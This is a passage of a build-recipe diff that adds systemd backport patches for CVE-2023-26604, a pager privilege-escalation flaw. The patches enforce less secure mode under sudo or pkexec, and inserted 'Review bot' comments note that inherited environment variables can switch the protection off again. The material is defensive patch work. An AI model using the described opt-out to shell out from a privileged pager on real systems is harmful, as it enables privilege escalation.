75 #include "copy.h"
76+#include "env-util.h"
77 #include "fd-util.h"
78 #include "fileio.h"
79 #include "io-util.h"
80@@ -152,8 +153,7 @@ int pager_open(PagerFlags flags) {
81 _exit(EXIT_FAILURE);
82 }
83
84- /* Initialize a good charset for less. This is
85- * particularly important if we output UTF-8
86+ /* Initialize a good charset for less. This is particularly important if we output UTF-8
87 * characters. */
88 less_charset = getenv("SYSTEMD_LESSCHARSET");
89 if (!less_charset && is_locale_utf8())
90@@ -164,6 +164,25 @@ int pager_open(PagerFlags flags) {
91 _exit(EXIT_FAILURE);
92 }
93
94+ /* People might invoke us from sudo, don't needlessly allow less to be a way to shell out
95+ * privileged stuff. */
96+ r = getenv_bool("SYSTEMD_LESSSECURE");
97+ if (r == 0) { /* Remove env var if off */
98+ if (unsetenv("LESSSECURE") < 0) {
99+ log_error_errno(errno, "Failed to uset environment variable LESSSECURE: %m");
100+ _exit(EXIT_FAILURE);
101+ }
102+ } else {
103+ /* Set env var otherwise */
104+ if (r < 0)
105+ log_warning_errno(r, "Unable to parse $SYSTEMD_LESSSECURE, ignoring: %m");
106+
107+ if (setenv("LESSSECURE", "1", 1) < 0) {
108+ log_error_errno(errno, "Failed to set environment variable LESSSECURE: %m");
109+ _exit(EXIT_FAILURE);
110+ }
111+ }
112+
113 if (pager_args) {
114 r = loop_write(exe_name_pipe[1], pager_args[0], strlen(pager_args[0]) + 1, false);
115 if (r < 0) {
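Review bot: The opt-out added to `pager_open()` is read from the caller's own environment: when `getenv_bool("SYSTEMD_LESSSECURE")` returns 0 the code calls `unsetenv("LESSSECURE")`, so in the sudo case the comment describes, an environment that carries `SYSTEMD_LESSSECURE=0` through switches the protection off again, and the variable only constrains less, not another pager selected through the pager variables. Unless a later patch in this series ties secure mode to a uid/euid mismatch, this patch covers the default configuration only, and that limit should be stated next to the CVE tag. The `r < 0` branch presumably also runs when the variable is simply unset (this depends on what `getenv_bool()` returns for a missing variable), which would log "Unable to parse $SYSTEMD_LESSSECURE" on every pager start; and the error string reads `Failed to uset`. The function continues outside the hunk.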
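--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2023-26604-2.patch
@@ -0,0 +1,264 @@
+From 1b5b507cd2d1d7a2b053151abb548475ad9c5c3b Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Mon, 12 Oct 2020 18:57:32 +0200
+Subject: [PATCH] test-login: always test sd_pid_get_owner_uid(), modernize
+
+A long time some function only worked when in a session, and the test
+didn't execute them when sd_pid_get_session() failed. Let's always call
+them to increase coverage.
+
+While at it, let's test for ==0 not >=0 where we don't expect the function
+to return anything except 0 or error.
+
+CVE: CVE-2023-26604
+Upstream-Status: Backport [https://github.com/systemd/systemd/pull/17270/commits/1b5b507cd2d1d7a2b053151abb548475ad9c5c3b.patch]
+Comments: Hunk not refreshed
+Signed-off-by: rajmohan r <rajmohan.r@kpit.com>
+---
+ src/libsystemd/sd-login/test-login.c | 131 ++++++++++++++-------------
+ 1 file changed, 70 insertions(+), 61 deletions(-)
+
+diff --git a/src/libsystemd/sd-login/test-login.c b/src/libsystemd/sd-login/test-login.c
+index c0c77e04714b..0494fc77ba18 100644
+--- a/src/libsystemd/sd-login/test-login.c
++++ b/src/libsystemd/sd-login/test-login.c
+@@ -5,21 +5,22 @@
+ #include "sd-login.h"
+
+ #include "alloc-util.h"
++#include "errno-list.h"
+ #include "fd-util.h"
+ #include "format-util.h"
+ #include "log.h"
+ #include "string-util.h"
+ #include "strv.h"
+ #include "time-util.h"
+-#include "util.h"
++#include "user-util.h"
+
+ static char* format_uids(char **buf, uid_t* uids, int count) {
+- int pos = 0, k, inc;
++ int pos = 0, inc;
+ size_t size = (DECIMAL_STR_MAX(uid_t) + 1) * count + 1;
+
+ assert_se(*buf = malloc(size));
+
+- for (k = 0; k < count; k++) {
++ for (int k = 0; k < count; k++) {
+ sprintf(*buf + pos, "%s"UID_FMT"%n", k > 0 ? " " : "", uids[k], &inc);
+ pos += inc;
+ }
+@@ -30,6 +31,10 @@ static char* format_uids(char **buf, uid_t* uids, int count) {
+ return *buf;
+ }
+
++static const char *e(int r) {
++ return r == 0 ? "OK" : errno_to_name(r);
++}
++
+ static void test_login(void) {
+ _cleanup_close_pair_ int pair[2] = { -1, -1 };
+ _cleanup_free_ char *pp = NULL, *qq = NULL,
+@@ -39,65 +44,71 @@ static void test_login(void) {
+ *seat = NULL, *session = NULL,
+ *unit = NULL, *user_unit = NULL, *slice = NULL;
+ int r;
+- uid_t u, u2;
+- char *t, **seats, **sessions;
++ uid_t u, u2 = UID_INVALID;
++ char *t, **seats = NULL, **sessions = NULL;
+
+ r = sd_pid_get_unit(0, &unit);
+- assert_se(r >= 0 || r == -ENODATA);
+- log_info("sd_pid_get_unit(0, …) → \"%s\"", strna(unit));
++ log_info("sd_pid_get_unit(0, …) → %s / \"%s\"", e(r), strnull(unit));
++ assert_se(IN_SET(r, 0, -ENODATA));
+
+ r = sd_pid_get_user_unit(0, &user_unit);
+- assert_se(r >= 0 || r == -ENODATA);
+- log_info("sd_pid_get_user_unit(0, …) → \"%s\"", strna(user_unit));
++ log_info("sd_pid_get_user_unit(0, …) → %s / \"%s\"", e(r), strnull(user_unit));
++ assert_se(IN_SET(r, 0, -ENODATA));
+
+ r = sd_pid_get_slice(0, &slice);
+- assert_se(r >= 0 || r == -ENODATA);
+- log_info("sd_pid_get_slice(0, …) → \"%s\"", strna(slice));
++ log_info("sd_pid_get_slice(0, …) → %s / \"%s\"", e(r), strnull(slice));
++ assert_se(IN_SET(r, 0, -ENODATA));
++
++ r = sd_pid_get_owner_uid(0, &u2);
++ log_info("sd_pid_get_owner_uid(0, …) → %s / "UID_FMT, e(r), u2);
++ assert_se(IN_SET(r, 0, -ENODATA));
+
+ r = sd_pid_get_session(0, &session);
+- if (r < 0) {
+- log_warning_errno(r, "sd_pid_get_session(0, …): %m");
+- if (r == -ENODATA)
+- log_info("Seems we are not running in a session, skipping some tests.");
+- } else {
+- log_info("sd_pid_get_session(0, …) → \"%s\"", session);
+-
+- assert_se(sd_pid_get_owner_uid(0, &u2) == 0);
+- log_info("sd_pid_get_owner_uid(0, …) → "UID_FMT, u2);
+-
+- assert_se(sd_pid_get_cgroup(0, &cgroup) == 0);
+- log_info("sd_pid_get_cgroup(0, …) → \"%s\"", cgroup);
+-
+- r = sd_uid_get_display(u2, &display_session);
+- assert_se(r >= 0 || r == -ENODATA);
+- log_info("sd_uid_get_display("UID_FMT", …) → \"%s\"",
+- u2, strnull(display_session));
+-
+- assert_se(socketpair(AF_UNIX, SOCK_STREAM, 0, pair) == 0);
+- sd_peer_get_session(pair[0], &pp);
+- sd_peer_get_session(pair[1], &qq);
+- assert_se(streq_ptr(pp, qq));
+-
+- r = sd_uid_get_sessions(u2, false, &sessions);
++ log_info("sd_pid_get_session(0, …) → %s / \"%s\"", e(r), strnull(session));
++
++ r = sd_pid_get_cgroup(0, &cgroup);
++ log_info("sd_pid_get_cgroup(0, …) → %s / \"%s\"", e(r), strnull(cgroup));
++ assert_se(r == 0);
++
++ r = sd_uid_get_display(u2, &display_session);
++ log_info("sd_uid_get_display("UID_FMT", …) → %s / \"%s\"", u2, e(r), strnull(display_session));
++ if (u2 == UID_INVALID)
++ assert_se(r == -EINVAL);
++ else
++ assert_se(IN_SET(r, 0, -ENODATA));
++
++ assert_se(socketpair(AF_UNIX, SOCK_STREAM, 0, pair) == 0);
++ sd_peer_get_session(pair[0], &pp);
++ sd_peer_get_session(pair[1], &qq);
++ assert_se(streq_ptr(pp, qq));
++
++ r = sd_uid_get_sessions(u2, false, &sessions);
++ assert_se(t = strv_join(sessions, " "));
++ log_info("sd_uid_get_sessions("UID_FMT", …) → %s \"%s\"", u2, e(r), t);
++ if (u2 == UID_INVALID)
++ assert_se(r == -EINVAL);
++ else {
+ assert_se(r >= 0);
+ assert_se(r == (int) strv_length(sessions));
+- assert_se(t = strv_join(sessions, " "));
+- strv_free(sessions);
+- log_info("sd_uid_get_sessions("UID_FMT", …) → [%i] \"%s\"", u2, r, t);
+- free(t);
++ }
++ sessions = strv_free(sessions);
++ free(t);
+
+- assert_se(r == sd_uid_get_sessions(u2, false, NULL));
++ assert_se(r == sd_uid_get_sessions(u2, false, NULL));
+
+- r = sd_uid_get_seats(u2, false, &seats);
++ r = sd_uid_get_seats(u2, false, &seats);
++ assert_se(t = strv_join(seats, " "));
++ log_info("sd_uid_get_seats("UID_FMT", …) → %s \"%s\"", u2, e(r), t);
++ if (u2 == UID_INVALID)
++ assert_se(r == -EINVAL);
++ else {
+ assert_se(r >= 0);
+ assert_se(r == (int) strv_length(seats));
+- assert_se(t = strv_join(seats, " "));
+- strv_free(seats);
+- log_info("sd_uid_get_seats("UID_FMT", …) → [%i] \"%s\"", u2, r, t);
+- free(t);
+-
+- assert_se(r == sd_uid_get_seats(u2, false, NULL));
+ }
++ seats = strv_free(seats);
++ free(t);
++
++ assert_se(r == sd_uid_get_seats(u2, false, NULL));
+
+ if (session) {
+ r = sd_session_is_active(session);
+@@ -109,7 +120,7 @@ static void test_login(void) {
+ log_info("sd_session_is_remote(\"%s\") → %s", session, yes_no(r));
+
+ r = sd_session_get_state(session, &state);
+- assert_se(r >= 0);
++ assert_se(r == 0);
+ log_info("sd_session_get_state(\"%s\") → \"%s\"", session, state);
+
+ assert_se(sd_session_get_uid(session, &u) >= 0);
+@@ -123,16 +134,16 @@ static void test_login(void) {
+ log_info("sd_session_get_class(\"%s\") → \"%s\"", session, class);
+
+ r = sd_session_get_display(session, &display);
+- assert_se(r >= 0 || r == -ENODATA);
++ assert_se(IN_SET(r, 0, -ENODATA));
+ log_info("sd_session_get_display(\"%s\") → \"%s\"", session, strna(display));
+
+ r = sd_session_get_remote_user(session, &remote_user);
+- assert_se(r >= 0 || r == -ENODATA);
++ assert_se(IN_SET(r, 0, -ENODATA));
+ log_info("sd_session_get_remote_user(\"%s\") → \"%s\"",
+ session, strna(remote_user));
+
+ r = sd_session_get_remote_host(session, &remote_host);
+- assert_se(r >= 0 || r == -ENODATA);
++ assert_se(IN_SET(r, 0, -ENODATA));
+ log_info("sd_session_get_remote_host(\"%s\") → \"%s\"",
+ session, strna(remote_host));
+
+@@ -161,7 +172,7 @@ static void test_login(void) {
+ assert_se(r == -ENODATA);
+ }
+
+- assert_se(sd_uid_get_state(u, &state2) >= 0);
++ assert_se(sd_uid_get_state(u, &state2) == 0);
+ log_info("sd_uid_get_state("UID_FMT", …) → %s", u, state2);
+ }
+
+@@ -173,11 +184,11 @@ static void test_login(void) {
+ assert_se(sd_uid_is_on_seat(u, 0, seat) > 0);
+
+ r = sd_seat_get_active(seat, &session2, &u2);
+- assert_se(r >= 0);
++ assert_se(r == 0);
+ log_info("sd_seat_get_active(\"%s\", …) → \"%s\", "UID_FMT, seat, session2, u2);
+
+ r = sd_uid_is_on_seat(u, 1, seat);
+- assert_se(r >= 0);
++ assert_se(IN_SET(r, 0, 1));
+ assert_se(!!r == streq(session, session2));
+
+ r = sd_seat_get_sessions(seat, &sessions, &uids, &n);
+@@ -185,8 +196,8 @@ static void test_login(void) {
+ assert_se(r == (int) strv_length(sessions));
+ assert_se(t = strv_join(sessions, " "));
+ strv_free(sessions);
+- log_info("sd_seat_get_sessions(\"%s\", …) → %i, \"%s\", [%i] {%s}",
+- seat, r, t, n, format_uids(&buf, uids, n));
++ log_info("sd_seat_get_sessions(\"%s\", …) → %s, \"%s\", [%u] {%s}",
++ seat, e(r), t, n, format_uids(&buf, uids, n));
+ free(t);
+
+ assert_se(sd_seat_get_sessions(seat, NULL, NULL, NULL) == r);
+@@ -204,7 +215,7 @@ static void test_login(void) {
+
+ r = sd_seat_get_active(NULL, &t, NULL);
+ assert_se(IN_SET(r, 0, -ENODATA));
+- log_info("sd_seat_get_active(NULL, …) (active session on current seat) → %s", strnull(t));
++ log_info("sd_seat_get_active(NULL, …) (active session on current seat) → %s / \"%s\"", e(r), strnull(t));
+ free(t);
+
+ r = sd_get_sessions(&sessions);
+@@ -244,13 +255,11 @@ static void test_login(void) {
+
+ static void test_monitor(void) {
+ sd_login_monitor *m = NULL;
+- unsigned n;
+ int r;
+
+- r = sd_login_monitor_new("session", &m);
+- assert_se(r >= 0);
++ assert_se(sd_login_monitor_new("session", &m) == 0);
+
+- for (n = 0; n < 5; n++) {
++ for (unsigned n = 0; n < 5; n++) {
+ struct pollfd pollfd = {};
+ usec_t timeout, nw;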
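Review bot: In test_login() the new `e(r)` helper is also applied to the results of sd_uid_get_sessions(), sd_uid_get_seats() and sd_seat_get_sessions(), which the neighbouring asserts treat as element counts (`r == (int) strv_length(sessions)`), so any non-zero count is passed to errno_to_name() instead of being printed as a number. The removed lines logged the count with `[%i]`; I would keep that and reserve `e()` for the error case, e.g. `log_info("sd_uid_get_sessions("UID_FMT", …) → %s [%i] \"%s\"", u2, r < 0 ? e(r) : "OK", r, t);`. What errno_to_name() returns for a positive count is not visible here, so the resulting log text should be checked; test_login() also continues outside the hunks shown.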
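--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2023-26604-3.patch
@@ -0,0 +1,182 @@
+From 0a42426d797406b4b01a0d9c13bb759c2629d108 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Wed, 7 Oct 2020 11:15:05 +0200
+Subject: [PATCH] pager: make pager secure when under euid is changed or
+ explicitly requested
+
+The variable is renamed to SYSTEMD_PAGERSECURE (because it's not just about
+less now), and we automatically enable secure mode in certain cases, but not
+otherwise.
+
+This approach is more nuanced, but should provide a better experience for
+users:
+
+- Previusly we would set LESSSECURE=1 and trust the pager to make use of
+ it. But this has an effect only on less. We need to not start pagers which
+ are insecure when in secure mode. In particular more is like that and is a
+ very popular pager.
+
+- We don't enable secure mode always, which means that those other pagers can
+ reasonably used.
+
+- We do the right thing by default, but the user has ultimate control by
+ setting SYSTEMD_PAGERSECURE.
+
+Fixes #5666.
+
+v2:
+- also check $PKEXEC_UID
+
+v3:
+- use 'sd_pid_get_owner_uid() != geteuid()' as the condition
+
+CVE: CVE-2023-26604
+Upstream-Status: Backport [https://github.com/systemd/systemd/pull/17270/commits/0a42426d797406b4b01a0d9c13bb759c2629d108]
+Comments: Hunk refreshed
+Signed-off-by: rajmohan r <rajmohan.r@kpit.com>
+---
+ man/less-variables.xml | 30 +++++++++++++++----
+ src/shared/pager.c | 63 ++++++++++++++++++++++++++-------------
+ 2 files changed, 66 insertions(+), 27 deletions(-)
+
+diff --git a/man/less-variables.xml b/man/less-variables.xml
+index c52511c..049e9f7 100644
+--- a/man/less-variables.xml
++++ b/man/less-variables.xml
+@@ -65,12 +65,30 @@
+ </varlistentry>
+
+ <varlistentry id='lesssecure'>
+- <term><varname>$SYSTEMD_LESSSECURE</varname></term>
+-
+- <listitem><para>Takes a boolean argument. Overrides the <varname>$LESSSECURE</varname> environment
+- variable when invoking the pager, which controls the "secure" mode of less (which disables commands
+- such as <literal>|</literal> which allow to easily shell out to external command lines). By default
+- less secure mode is enabled, with this setting it may be disabled.</para></listitem>
++ <term><varname>$SYSTEMD_PAGERSECURE</varname></term>
++
++ <listitem><para>Takes a boolean argument. When true, the "secure" mode of the pager is enabled; if
++ false, disabled. If <varname>$SYSTEMD_PAGERSECURE</varname> is not set at all, secure mode is enabled
++ if the effective UID is not the same as the owner of the login session, see <citerefentry
++ project='man-pages'><refentrytitle>geteuid</refentrytitle><manvolnum>2</manvolnum></citerefentry> and
++ <citerefentry><refentrytitle>sd_pid_get_owner_uid</refentrytitle><manvolnum>3</manvolnum></citerefentry>.
++ In secure mode, <option>LESSSECURE=1</option> will be set when invoking the pager, and the pager shall
++ disable commands that open or create new files or start new subprocesses. When
++ <varname>$SYSTEMD_PAGERSECURE</varname> is not set at all, pagers which are not known to implement
++ secure mode will not be used. (Currently only
++ <citerefentry><refentrytitle>less</refentrytitle><manvolnum>1</manvolnum></citerefentry> implements
++ secure mode.)</para>
++
++ <para>Note: when commands are invoked with elevated privileges, for example under <citerefentry
++ project='man-pages'><refentrytitle>sudo</refentrytitle><manvolnum>8</manvolnum></citerefentry> or
++ <citerefentry
++ project='die-net'><refentrytitle>pkexec</refentrytitle><manvolnum>1</manvolnum></citerefentry>, care
++ must be taken to ensure that unintended interactive features are not enabled. "Secure" mode for the
++ pager may be enabled automatically as describe above. Setting <varname>SYSTEMD_PAGERSECURE=0</varname>
++ or not removing it from the inherited environment allows the user to invoke arbitrary commands. Note
++ that if the <varname>$SYSTEMD_PAGER</varname> or <varname>$PAGER</varname> variables are to be
++ honoured, <varname>$SYSTEMD_PAGERSECURE</varname> must be set too. It might be reasonable to completly
++ disable the pager using <option>--no-pager</option> instead.</para></listitem>
+ </varlistentry>
+
+ <varlistentry id='colors'>
+diff --git a/src/shared/pager.c b/src/shared/pager.c
+index a3b6576..a72d9ea 100644
+--- a/src/shared/pager.c
++++ b/src/shared/pager.c
+@@ -8,6 +8,8 @@
+ #include <sys/prctl.h>
+ #include <unistd.h>
+
++#include "sd-login.h"
++
+ #include "copy.h"
+ #include "env-util.h"
+ #include "fd-util.h"
+@@ -164,25 +166,42 @@ int pager_open(PagerFlags flags) {
+ }
+
+ /* People might invoke us from sudo, don't needlessly allow less to be a way to shell out
+- * privileged stuff. */
+- r = getenv_bool("SYSTEMD_LESSSECURE");
+- if (r == 0) { /* Remove env var if off */
+- if (unsetenv("LESSSECURE") < 0) {
+- log_error_errno(errno, "Failed to uset environment variable LESSSECURE: %m");
+- _exit(EXIT_FAILURE);
+- }
+- } else {
+- /* Set env var otherwise */
++ * privileged stuff. If the user set $SYSTEMD_PAGERSECURE, trust their configuration of the
++ * pager. If they didn't, use secure mode when under euid is changed. If $SYSTEMD_PAGERSECURE
++ * wasn't explicitly set, and we autodetect the need for secure mode, only use the pager we
++ * know to be good. */
++ int use_secure_mode = getenv_bool("SYSTEMD_PAGERSECURE");
++ bool trust_pager = use_secure_mode >= 0;
++ if (use_secure_mode == -ENXIO) {
++ uid_t uid;
++
++ r = sd_pid_get_owner_uid(0, &uid);
+ if (r < 0)
+- log_warning_errno(r, "Unable to parse $SYSTEMD_LESSSECURE, ignoring: %m");
++ log_debug_errno(r, "sd_pid_get_owner_uid() failed, enabling pager secure mode: %m");
+
+- if (setenv("LESSSECURE", "1", 1) < 0) {
+- log_error_errno(errno, "Failed to set environment variable LESSSECURE: %m");
+- _exit(EXIT_FAILURE);
+- }
++ use_secure_mode = r < 0 || uid != geteuid();
++
++ } else if (use_secure_mode < 0) {
++ log_warning_errno(use_secure_mode, "Unable to parse $SYSTEMD_PAGERSECURE, assuming true: %m");
++ use_secure_mode = true;
+ }
+
+- if (pager_args) {
++ /* We generally always set variables used by less, even if we end up using a different pager.
++ * They shouldn't hurt in any case, and ideally other pagers would look at them too. */
++ if (use_secure_mode)
++ r = setenv("LESSSECURE", "1", 1);
++ else
++ r = unsetenv("LESSSECURE");
++ if (r < 0) {
++ log_error_errno(errno, "Failed to adjust environment variable LESSSECURE: %m");
++ _exit(EXIT_FAILURE);
++ }
++
++ if (trust_pager && pager_args) { /* The pager config might be set globally, and we cannot
++ * know if the user adjusted it to be appropriate for the
++ * secure mode. Thus, start the pager specified through
++ * envvars only when $SYSTEMD_PAGERSECURE was explicitly set
++ * as well. */
+ r = loop_write(exe_name_pipe[1], pager_args[0], strlen(pager_args[0]) + 1, false);
+ if (r < 0) {
+ log_error_errno(r, "Failed to write pager name to socket: %m");
+@@ -194,13 +213,14 @@ int pager_open(PagerFlags flags) {
+ "Failed to execute '%s', using fallback pagers: %m", pager_args[0]);
+ }
+
+- /* Debian's alternatives command for pagers is
+- * called 'pager'. Note that we do not call
+- * sensible-pagers here, since that is just a
+- * shell script that implements a logic that
+- * is similar to this one anyway, but is
+- * Debian-specific. */
++ /* Debian's alternatives command for pagers is called 'pager'. Note that we do not call
++ * sensible-pagers here, since that is just a shell script that implements a logic that is
++ * similar to this one anyway, but is Debian-specific. */
+ FOREACH_STRING(exe, "pager", "less", "more") {
++ /* Only less implements secure mode right now. */
++ if (use_secure_mode && !streq(exe, "less"))
++ continue;
++
+ r = loop_write(exe_name_pipe[1], exe, strlen(exe) + 1, false);
+ if (r < 0) {
+ log_error_errno(r, "Failed to write pager name to socket: %m");
+@@ -211,6 +231,7 @@ int pager_open(PagerFlags flags) {
+ "Failed to execute '%s', using next fallback pager: %m", exe);
+ }
+
++ /* Our builtin is also very secure. */
+ r = loop_write(exe_name_pipe[1], "(built-in)", strlen("(built-in)") + 1, false);
+ if (r < 0) {
+ log_error_errno(r, "Failed to write pager name to socket: %m");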
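Review bot: `bool trust_pager = use_secure_mode >= 0;` in pager_open() treats any parseable $SYSTEMD_PAGERSECURE, including a true value, as permission to run the pager named by the environment, while the patch description says `LESSSECURE=1` has an effect only on less. The block comment above it says "trust their configuration of the pager" but does not state that the protection then depends on the privilege boundary (sudo, pkexec) not passing the variable through, which the man-page hunk of the same patch does spell out. I would extend the comment with `/* Any explicit value, even true, re-enables $SYSTEMD_PAGER/$PAGER; callers crossing a privilege boundary must drop $SYSTEMD_PAGERSECURE from the inherited environment. */`. pager_open() starts and ends outside the hunk.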
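--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2023-26604-4.patch
@@ -0,0 +1,32 @@
+From b8f736b30e20a2b44e7c34bb4e43b0d97ae77e3c Mon Sep 17 00:00:00 2001
+From: Lennart Poettering <lennart@poettering.net>
+Date: Thu, 15 Oct 2020 10:54:48 +0200
+Subject: [PATCH] pager: lets check SYSTEMD_PAGERSECURE with secure_getenv()
+
+I can't think of any real vulnerability about this, but it still feels
+better to check a variable with "secure" in its name with
+secure_getenv() rather than plain getenv().
+
+Paranoia FTW!
+
+CVE: CVE-2023-26604
+Upstream-Status: Backport [https://github.com/systemd/systemd/pull/17359/commits/b8f736b30e20a2b44e7c34bb4e43b0d97ae77e3c]
+Comments: Hunk refreshed
+Signed-off-by: rajmohan r <rajmohan.r@kpit.com>
+---
+ src/shared/pager.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/shared/pager.c b/src/shared/pager.c
+index a72d9ea..250519c 100644
+--- a/src/shared/pager.c
++++ b/src/shared/pager.c
+@@ -170,7 +170,7 @@ int pager_open(PagerFlags flags) {
+ * pager. If they didn't, use secure mode when under euid is changed. If $SYSTEMD_PAGERSECURE
+ * wasn't explicitly set, and we autodetect the need for secure mode, only use the pager we
+ * know to be good. */
+- int use_secure_mode = getenv_bool("SYSTEMD_PAGERSECURE");
++ int use_secure_mode = getenv_bool_secure("SYSTEMD_PAGERSECURE");
+ bool trust_pager = use_secure_mode >= 0;
+ if (use_secure_mode == -ENXIO) {
+ uid_t uid;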
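Review bot: The switch to `getenv_bool_secure("SYSTEMD_PAGERSECURE")` needs a comment on what it does and does not cover, because the comment just above it talks about sudo. As far as I know secure_getenv() hides a variable only when the process runs in secure-execution mode (set-id or file-capability binaries); a tool started through sudo is presumably not in that mode, so an inherited $SYSTEMD_PAGERSECURE is still read and still sets `trust_pager`. I would add `/* secure variant: ignored only in secure-execution (AT_SECURE) processes; under sudo/pkexec the variable has to be dropped by the environment policy */` above the changed line. Whether env-util in this recipe's systemd version already provides getenv_bool_secure() is not visible in this hunk and should be confirmed for the backport; pager_open() starts and ends outside the hunk.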
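--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch
@@ -0,0 +1,78 @@
+From 1f25c71d9d0b5fe6cf383c347dcebc2443a99fe1 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Tue, 1 Sep 2020 12:42:35 +0200
+Subject: [PATCH] basic: pass allocation info for ordered_set_new() and
+ introduce ordered_set_ensure_put()
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/1f25c71d9d0b5fe6cf383c347dcebc2443a99fe1]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/basic/ordered-set.c | 21 +++++++++++++++++++++
+ src/basic/ordered-set.h | 18 +++++++-----------
+ 2 files changed, 28 insertions(+), 11 deletions(-)
+
+diff --git a/src/basic/ordered-set.c b/src/basic/ordered-set.c
+index 7fdb47e064..fb82c17b5a 100644
+--- a/src/basic/ordered-set.c
++++ b/src/basic/ordered-set.c
+@@ -4,6 +4,27 @@
+ #include "ordered-set.h"
+ #include "strv.h"
+
++int _ordered_set_ensure_allocated(OrderedSet **s, const struct hash_ops *ops HASHMAP_DEBUG_PARAMS) {
++ if (*s)
++ return 0;
++
++ *s = _ordered_set_new(ops HASHMAP_DEBUG_PASS_ARGS);
++ if (!*s)
++ return -ENOMEM;
++
++ return 0;
++}
++
++int _ordered_set_ensure_put(OrderedSet **s, const struct hash_ops *ops, void *p HASHMAP_DEBUG_PARAMS) {
++ int r;
++
++ r = _ordered_set_ensure_allocated(s, ops HASHMAP_DEBUG_PASS_ARGS);
++ if (r < 0)
++ return r;
++
++ return ordered_set_put(*s, p);
++}
++
+ int ordered_set_consume(OrderedSet *s, void *p) {
+ int r;
+
+diff --git a/src/basic/ordered-set.h b/src/basic/ordered-set.h
+index a42a57eb49..2c241a808b 100644
+--- a/src/basic/ordered-set.h
++++ b/src/basic/ordered-set.h
+@@ -7,20 +7,16 @@
+
+ typedef struct OrderedSet OrderedSet;
+
+-static inline OrderedSet* ordered_set_new(const struct hash_ops *ops) {
+- return (OrderedSet*) ordered_hashmap_new(ops);
++static inline OrderedSet* _ordered_set_new(const struct hash_ops *ops HASHMAP_DEBUG_PARAMS) {
++ return (OrderedSet*) internal_ordered_hashmap_new(ops HASHMAP_DEBUG_PASS_ARGS);
+ }
++#define ordered_set_new(ops) _ordered_set_new(ops HASHMAP_DEBUG_SRC_ARGS)
+
+-static inline int ordered_set_ensure_allocated(OrderedSet **s, const struct hash_ops *ops) {
+- if (*s)
+- return 0;
++int _ordered_set_ensure_allocated(OrderedSet **s, const struct hash_ops *ops HASHMAP_DEBUG_PARAMS);
++#define ordered_set_ensure_allocated(s, ops) _ordered_set_ensure_allocated(s, ops HASHMAP_DEBUG_SRC_ARGS)
+
+- *s = ordered_set_new(ops);
+- if (!*s)
+- return -ENOMEM;
+-
+- return 0;
+-}
++int _ordered_set_ensure_put(OrderedSet **s, const struct hash_ops *ops, void *p HASHMAP_DEBUG_PARAMS);
++#define ordered_set_ensure_put(s, hash_ops, key) _ordered_set_ensure_put(s, hash_ops, key HASHMAP_DEBUG_SRC_ARGS)
+
+ static inline OrderedSet* ordered_set_free(OrderedSet *s) {
+ return (OrderedSet*) ordered_hashmap_free((OrderedHashmap*) s);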
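--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch
@@ -0,0 +1,35 @@
+From d38a6476aad3f2cc80a2a4bc11f3898cc06a70f5 Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Mon, 26 Apr 2021 23:52:40 +0900
+Subject: [PATCH] ordered-set: introduce
+ ordered_set_clear/free_with_destructor()
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/d38a6476aad3f2cc80a2a4bc11f3898cc06a70f5]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/basic/ordered-set.h | 11 +++++++++++
+ 1 file changed, 11 insertions(+)
+
+diff --git a/src/basic/ordered-set.h b/src/basic/ordered-set.h
+index a377f20b1f..64df41766f 100644
+--- a/src/basic/ordered-set.h
++++ b/src/basic/ordered-set.h
+@@ -63,6 +63,17 @@ void ordered_set_print(FILE *f, const char *field, OrderedSet *s);
+ #define ORDERED_SET_FOREACH(e, s, i) \
+ for ((i) = ITERATOR_FIRST; ordered_set_iterate((s), &(i), (void**)&(e)); )
+
++#define ordered_set_clear_with_destructor(s, f) \
++ ({ \
++ OrderedSet *_s = (s); \
++ void *_item; \
++ while ((_item = ordered_set_steal_first(_s))) \
++ f(_item); \
++ _s; \
++ })
++#define ordered_set_free_with_destructor(s, f) \
++ ordered_set_free(ordered_set_clear_with_destructor(s, f))
++
+ DEFINE_TRIVIAL_CLEANUP_FUNC(OrderedSet*, ordered_set_free);
+ DEFINE_TRIVIAL_CLEANUP_FUNC(OrderedSet*, ordered_set_free_free);
+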
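--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch
@@ -0,0 +1,285 @@
+From 19d9a5adf0c1a6b5a243eea0390f6f6526d569de Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Fri, 7 May 2021 15:39:16 +0900
+Subject: [PATCH] network: add skeleton of request queue
+
+This will be used in later commits.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/19d9a5adf0c1a6b5a243eea0390f6f6526d569de]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/network/meson.build | 2 +
+ src/network/networkd-link.c | 20 +++++-
+ src/network/networkd-manager.c | 7 ++
+ src/network/networkd-manager.h | 2 +
+ src/network/networkd-queue.c | 121 +++++++++++++++++++++++++++++++++
+ src/network/networkd-queue.h | 42 ++++++++++++
+ 6 files changed, 192 insertions(+), 2 deletions(-)
+ create mode 100644 src/network/networkd-queue.c
+ create mode 100644 src/network/networkd-queue.h
+
+diff --git a/src/network/meson.build b/src/network/meson.build
+index 4fca3106dc..a8b9232e64 100644
+--- a/src/network/meson.build
++++ b/src/network/meson.build
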